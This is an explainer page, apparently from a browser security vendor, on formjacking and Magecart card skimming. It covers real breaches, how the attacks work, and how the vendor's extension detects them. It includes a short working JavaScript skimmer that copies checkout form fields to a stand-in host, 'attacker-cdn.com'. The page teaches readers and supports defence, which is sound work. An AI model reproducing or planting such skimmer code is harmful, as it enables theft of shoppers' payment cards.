Formjacking Attacks

Q: Can antivirus software detect formjacking?

Traditional antivirus is not designed to detect formjacking. Antivirus scans files on your computer, but formjacking happens entirely in the browser — malicious JavaScript runs on a remote website you're visiting. You never download a file. Browser-based security tools like PhishClean are better suited to catch this kind of attack because they can analyze page content and form behavior in real time.

Q: How do I know if a website has been formjacked?

You almost certainly won't know by looking at it. Formjacked pages look and behave normally — the skimmer script runs invisibly in the background. The only reliable ways to detect formjacking are: inspecting the page's JavaScript for unfamiliar external scripts, monitoring network requests for data being sent to unknown domains, or using a browser security extension like PhishClean that detects form data being exfiltrated to third-party servers.

Q: Is formjacking the same as phishing?

No. Phishing tricks you into visiting a fake website. Formjacking compromises a real, legitimate website by injecting malicious code. With formjacking, you're on the correct domain, the SSL certificate is valid, and everything looks authentic — because it is. The only difference is a hidden script copying your form data to the attacker's server.

In September 2018, British Airways disclosed that attackers had stolen payment card details from 380,000 customers. The cards weren't taken from a database breach. They were skimmed — in real time — from the checkout page by 22 lines of JavaScript.

Symantec blocked an average of 4,800 formjacking attempts per month across their customer base in 2019. The attacks targeted everything from small Shopify stores to Fortune 500 companies. A single compromised site can bleed card numbers for months before anyone notices.

What Formjacking Looks Like Under the Hood

Formjacking is the digital equivalent of a card skimmer at a gas pump. Except instead of a physical device, it's a few lines of JavaScript injected into a website's checkout page. The code watches for form submissions — specifically payment forms — and silently copies the data to a server controlled by the attacker.

Here's a simplified version of what a formjacking script does:

      // Simplified formjacking skimmer

      document.querySelector('form#checkout')

        .addEventListener('submit', function(e) {

          var formData = new FormData(e.target);

          var stolen = {};

          formData.forEach(function(val, key) {

            stolen[key] = val;

          });

          // Send stolen data to attacker's server

          navigator.sendBeacon(

            'https://attacker-cdn.com/collect',

            JSON.stringify(stolen)

          );

        });

That's it. The form still submits normally to the real payment processor. Your order goes through. You get a confirmation email. The only difference is that your card number, expiration date, and CVV were also sent to someone else.

This is what makes formjacking so dangerous — there's zero visible impact on the user experience.

Who's Behind It: Magecart and Beyond

The term "Magecart" refers to a loose coalition of cybercriminal groups that specialize in web-based card skimming. The name comes from their early focus on Magento e-commerce platforms, but they've long since expanded to target any website that processes payments.

Notable Magecart attacks include:

British Airways (2018) — 380,000 payment cards stolen over 15 days. The attackers modified a single JavaScript file on BA's website. They were fined £20 million by the UK's ICO.
Ticketmaster (2018) — Compromised via a third-party chat widget (Inbenta). The skimmer ran on Ticketmaster's payment pages for months before detection.
Newegg (2018) — A skimmer injected into the checkout page ran for over a month, affecting desktop and mobile customers.
Thousands of small stores — The bulk of formjacking targets aren't headline names. Small Magento, WooCommerce, and Shopify stores get compromised through vulnerable plugins, weak admin passwords, or outdated software.

How Attackers Get the Script Onto a Website

Compromise the site directly

The attacker exploits a vulnerability in the website's CMS, admin panel, or server. Outdated Magento installations are a classic target — known vulnerabilities give attackers direct access to modify JavaScript files.

Poison a third-party script

Many sites load JavaScript from external providers — analytics, chat widgets, A/B testing tools. If the attacker compromises one of these providers, their skimmer gets injected into every site that loads that script. The Ticketmaster breach worked exactly this way.

Target the build pipeline

Sophisticated attackers compromise npm packages or build tools used by the website. The malicious code gets bundled into the site's JavaScript during the build process, making it nearly impossible to detect through simple file comparison.

Here's the part that surprises most people: formjacking doesn't set off any of the usual alarm bells. The site's SSL certificate is valid. The URL is correct. The page is the real checkout page. Your antivirus won't flag it because you haven't downloaded anything. Google Safe Browsing won't block it because the domain itself isn't malicious.

Why Traditional Security Tools Miss Formjacking

This is one of the most overlooked attack vectors, and the reason is structural. Most security tools weren't built for this threat model:

Antivirus scans files on your computer. Formjacking runs remotely in your browser — there's no file to scan.
Firewalls monitor network connections, not JavaScript behavior inside a web page.
Safe Browsing blocklists flag known-bad domains. The formjacked site is a legitimate domain — it's the injected script that's malicious.
Ad blockers block known tracking and ad domains. Formjacking scripts often use disposable domains or disguise their endpoints as CDNs.

The attack lives in the gap between "the site is trustworthy" and "the code running on the site is trustworthy." Those are two very different things.

How PhishClean Catches Formjacking

PhishClean approaches the problem from the browser's perspective — which is exactly where formjacking happens. Two of its 15 detection signals are directly relevant:

Password Field Detection — PhishClean monitors when password or payment form fields are present and checks whether the form's action URL matches the page's domain. A mismatch is a strong signal that data is being exfiltrated.
Form Domain Mismatch — If a form on legitimate-store.com submits data to sketchy-cdn.com, PhishClean flags it. Legitimate payment processors (Stripe, PayPal) are whitelisted, but unknown external domains trigger an alert.

These checks run locally on every page you visit. No browsing data leaves your device. PhishClean doesn't need to know you're shopping — it just watches for the patterns that indicate form data is going somewhere it shouldn't.

Related Threats

Phishing Attacks

Fake pages that trick you into entering credentials — the other side of credential theft.

Hidden iFrame Attacks

Invisible iframes used for clickjacking and credential harvesting.

SSL Stripping

Downgrading HTTPS connections so attackers can read your traffic.

API Key Leaks

When developer secrets end up exposed in web pages and source code.

Frequently Asked Questions

Can antivirus software detect formjacking?

Generally, no. Antivirus scans files on your device, but formjacking runs as JavaScript on a remote website you're visiting. There's nothing downloaded to your computer for antivirus to detect. Browser-based security tools like PhishClean are better suited because they can analyze the behavior of scripts running in the page.

How do I know if a website has been formjacked?

You almost certainly can't tell by looking at it. The page looks normal, works normally, and your transaction completes successfully. The skimmer runs invisibly. The realistic options are: inspect the page's network requests in DevTools for unfamiliar outbound connections, or use a browser extension like PhishClean that monitors form behavior automatically.

Is formjacking the same as phishing?

No. Phishing uses a fake website to trick you into entering information. Formjacking compromises the real website. You're on the correct domain with a valid SSL certificate — everything is genuine except for the hidden script copying your data. That's what makes it harder to detect.

Protect Your Payment Data

PhishClean detects when form data is being sent to suspicious third-party servers — locally, in real time. 3-day free trial, no credit card required.

Install PhishClean